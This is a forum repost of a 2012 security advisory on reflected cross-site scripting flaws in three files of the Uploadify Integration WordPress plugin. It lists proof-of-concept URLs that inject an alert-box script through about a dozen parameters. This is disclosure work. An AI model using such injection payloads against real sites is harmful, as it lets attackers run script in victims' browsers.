|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 97
Members: 0
Total: 97
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
[waraxe-2012-SA#085] - XSS in Uploadify Integratiotion |
|
Posted: Sat Apr 07, 2012 10:32 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin
Author: Janek Vind "waraxe"
Date: 06. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-85.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Uploadify Integration allows you to insert a jQuery uploadify uploader into your
forms. Features: Uses jQuery Uploadify, Automatically saves to post meta, user
meta, an option, or temporary depending on the metaType selected by the shortcode.
Allows more than one shortcode per page.
http://wordpress.org/extend/plugins/uploadify-integration/
Vulnerable versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected is Uploadify Integration 0.9.6, older versions may be affected as well.
###############################################################################
1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php"
###############################################################################
Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
Tests:
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>
Result: XSS payload execution can be observed
###############################################################################
2. Reflected XSS vulnerability in "views/scripts/partials/file.php"
###############################################################################
Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
Tests:
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
Result: XSS payload execution can be observed
###############################################################################
3. Reflected XSS vulnerability in "views/scripts/file/error.php"
###############################################################################
Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
Tests:
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>
Result: XSS payload execution can be observed
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------ |
|
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|